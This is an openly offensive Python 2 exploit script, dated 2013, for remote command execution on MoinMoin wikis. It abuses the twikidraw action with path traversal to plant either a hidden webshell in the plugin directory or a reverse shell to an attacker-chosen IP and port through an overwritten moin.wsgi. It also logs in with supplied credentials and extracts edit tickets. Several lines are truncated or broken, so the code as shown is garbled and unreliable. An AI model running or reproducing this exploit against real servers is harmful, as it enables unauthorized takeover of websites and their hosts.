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MoinMoin - Arbitrary Command Execution

#!/usr/bin/env python
# -*- coding: utf-8 -*-
ascii = '\x1b[1;31m'###########################################################################
ascii +='                                                                                \r\n'#
ascii +=' ██████████    ██████   ███  ███  ███    ██████████   ████████  ███     ███████ \r\n'#
ascii +=' ███████████  ████████  ███  ████ ███    ███████████  ████████  ███     ███████ \r\n'#
ascii +=' ██▒ ██▒ ██▒  ██▒  ███  ██▒  ██▒█▒███    ██▒ ██▒ ██▒  ██▒       ██▒       ██▒   \r\n'#
ascii +=' ▒█▒ ▒█▒ ▒█▒  ▒█▒  █▒█  ▒█▒  ▒█▒▒█▒█▒    ▒█▒ ▒█▒ ▒█▒  ▒█▒       ▒█▒       ▒█▒   \r\n'#
ascii +=' █▒▒ ▒▒█ █▒█  █▒█  ▒█▒  ▒▒█  █▒█ ▒▒█▒    █▒▒ ▒▒█ █▒█  █▒▒▒░▒    █▒▒       █▒▒   \r\n'#
ascii +=' ▒█▒   ▒ ▒█▒  ▒█▒  ▒▒▒  ▒▒▒  ▒█▒  ▒▒▒    ▒█▒   ▒ ▒█▒  ▒▒▒▒▒░    ▒▒▒       ▒▒▒   \r\n'#
ascii +=' ▒▒░     ▒▒░  ▒▒░  ▒▒▒  ▒▒░  ▒▒░  ▒▒▒    ▒▒░     ▒▒░  ▒▒░       ▒▒░       ▒▒░   \r\n'#
ascii +=' ░▒░     ░▒░  ░▒░  ▒░▒  ░▒░  ░▒░  ▒░▒    ░▒░     ░▒░  ░▒░        ░▒░      ░▒░   \r\n'#
ascii +=' ░░░     ░░   ░░░░░ ░░   ░░   ░░   ░░    ░░░     ░░    ░░ ░░░░   ░░ ░░░░   ░░   \r\n'#
ascii +='  ░      ░     ░ ░  ░   ░    ░░    ░      ░      ░    ░ ░░ ░░   ░ ░░ ░ ░   ░    \r\n'#
ascii +='                                                                                \r\n'#
ascii +='        ~[  PoC v2 : Remote arbitrary command execution for MoinMoin  ]~        \r\n'#
ascii +='\x1b[0m'##############################################################################
# V1: Stealth webshell, available upon Apache restart (24H)
# V2: Update stealth webshell, backconnect shell, available immediately (RISKY); Login functionality
# ToDo: Handle TextCha's, spoof UA
# Usage:     python
# Requires: `requests` module, socat
# cr3dz: [HTP], Unnamed
import requests, re, getpass, random
print ascii
print "[*] Now with", random.choice(["hookers",
                                     "SYN floods",
                                     "integrated LOIC",
                                     "a bullshit Reason Generator",
                                     "UDP floods",
                                     "an admin informer",
                                     "a backdoor",
                                     "automatic defacing",
                                     "Full Disclosure letters",
                                     "an End-User License Agreement",
                                     "a 30-day Trial",
                                     "a free AOL subscription",
                                     "more educational value",
                                     "Havij support",
                                     "advice from Sabu",
                                     "incomprehensible commentary",
                                     "hacker apparel",
                                     "advice from Kevin Mitnick",
                                     "a Unity applet",
                                     "FreeNode support",
                                     "advice from Chippy1337"]) + "!"
target = raw_input("[*] Target site? ").replace("http://","").replace("FrontPage","").replace("WikiSandBox","")
print "[*] Method of execution:"
print "[1] Stealth webshell, available upon Apache restart (24H)"
print "[2] Backconnect shell, available immediately (RISKY)"
print "[3] Exit"
method = raw_input("> ")
if method=='3':
elif method=='2':
    print "[*] Preparing exploit.."
    filename = 'drawing.r if()else[]\nexec eval("open(__file__)\\56read()\\56split(\'[MARK]\')[-2]\\56strip(\'\\\\0\')")'
    data = """IyAtKi0gY29kaW5nOiBpc28tODg1OS0xIC0qLQoKaW1wb3J0IHN5cywgb3MsIHNvY2tldCwgcHR5
elif method=='1':
    print "[*] Preparing exploit.."
    filename = "drawing.r if()else[]\nimport os\ndef execute(p,r):exec\"print>>r,os\\56popen(r\\56values['c'])\\56read()\""
    data = "MoinMoin error\n"
    print "[-] \x1b[0;31mInvalid method\x1b[0m"
print "[*] Checking permissions on WikiSandBox page.."
permission_check = requests.get("http://%s/WikiSandBox" % target).text
if "Edit (Text)" in permission_check:
    print "[+] No security"
    check = True
elif "Immutable Page" in permission_check:
    print "[-] Authorization required"
    check = False
    print "[-] \x1b[0;31mCould not identify editable page!\x1b[0m"
    print "[-] Authorization required"
    check = False
if not check:
    have_acc = raw_input("[*] Do you have an account? [Y/N] ").lower()
    if have_acc.startswith("y"):
        username = raw_input("[*] Username: ")
        password = getpass.getpass("[*] Password: ")
        print "[-] \x1b[0;31mCreate an account and restart the exploitation process\x1b[0m"
        print "[-] http://%s/?action=newaccount" % target
    url = "http://%s/" % target
    print "[*] Logging in"
    signon = {'action':'login','name':username,'password':password,'login':'Login'}
    jar =, data=signon).cookies
    for cookie in jar.values():
        if len(cookie)==40:
    if not authorizationcookie:
        print "[-] \x1b[0;31mLogin failed\x1b[0m"
        print "[+] Login succeeded"
    permission_check2 = requests.get("http://%s/WikiSandBox" % target).text
    if "Edit (Text)" in permission_check2:
        print "[+] Successfully authorized to edit pages"
    elif "Immutable Page" in permission_check:
        print "[-] \x1b[0;31mFailed authorization check\x1b[0m"
        print "[?] \x1b[0;33mLost track of environment.. continuing anyway\x1b[0m"
print "[*] Obtaining ticket credentials to write backdoor.."
if method == '1':
    ticket = requests.get("http://%s/WikiSandBox?action=twikidraw&do=modify&target=../../../plugin/action/" % target, cookies=jar)
elif method == '2':
    ticket = requests.get("http://%s/WikiSandBox?action=twikidraw&do=modify&target=../../../../moin.wsgi" % target, cookies=jar)
m ='ticket=(.*?)&target', ticket.text)
    ticket_hash =
    print "[+] Extracted ticket hash from MoinMoin: %s" % (ticket_hash)
    print "[-] \x1b[0;31mFailed to extract ticket hash from MoinMoin!\x1b[0m"
print "[*] Sending payload.."
if method == '1':
    url = "http://%s/WikiSandBox?action=twikidraw&do=save&ticket=%s&target=../../../plugin/action/" % (target, ticket_hash)
    b = []
    b.append("Content-Disposition: form-data; name=\"filename\"\r\n\r\n%s" % (filename))
    b.append("Content-Disposition: form-data; name=\"filepath\"; filename=\"drawing.png\"")
    b.append("Content-Type: image/png\r\n")
    body = "\r\n".join(b)
    headers = {}
    headers['Content-Type'] = 'multipart/form-data; boundary=89692781418184'
    r =, cookies=jar, data=body, headers=headers)
    if(r.text == ""):
        print "[+] Exploit completed"
        print "[*] Upon Apache restart, your shell will be available at:"
        print "http://%s/WikiSandBox?action=moinexec&c=[command]" % target
        print "[-] \x1b[0;31mExploit failed\x1b[0m"
elif method == '2':
    print "[*] Backconnect options:"
    ip   = raw_input("[*] IP? ")
    port = raw_input("[*] Port? ")
    print "[*] To recieve your shell, login to %s and run: socat file:`tty`,raw,echo=0 tcp4-listen:%s" % (ip,port)
    raw_input("[*] Press enter to continue ")
    payload = "[MARK]exec \"%s\".decode(\"base64\")[MARK]\n" % data.replace("[IP]",ip).replace("[PORT]",port).encode("base64").replace("\n","")
    url = "http://%s/WikiSandBox?action=twikidraw&do=save&ticket=%s&target=../../../../moin.wsgi" % (target, ticket_hash)
    b = []
    b.append("Content-Disposition: form-data; name=\"filename\"\r\n\r\n%s" % (filename))
    b.append("Content-Disposition: form-data; name=\"filepath\"; filename=\"drawing.png\"")
    b.append("Content-Type: image/png\r\n")
    body = "\r\n".join(b)
    headers = {}
    headers['Content-Type'] = 'multipart/form-data; boundary=89692781418184'
    r =, cookies=jar, data=body, headers=headers)
    if(r.text == ""):
        print "[+] Payload file written"
        print "[-] \x1b[0;31mExploit failed\x1b[0m"
    print "[*] Sending reverse shell"
    result = requests.get("http://%s/WikiSandBox?action=AttachFile" % target, cookies=jar).text
    if "Internal Server Error" in result or "Traceback" in result:
        print "[-] \x1b[0;31mSHIT\x1b[0m"
        print "[+] Shell sent successfully"
# American: How the fuck did you get in here?
# Lone Man: I used my imagination.

0utLaw$ L4BxI [ 09/05/2013 ]


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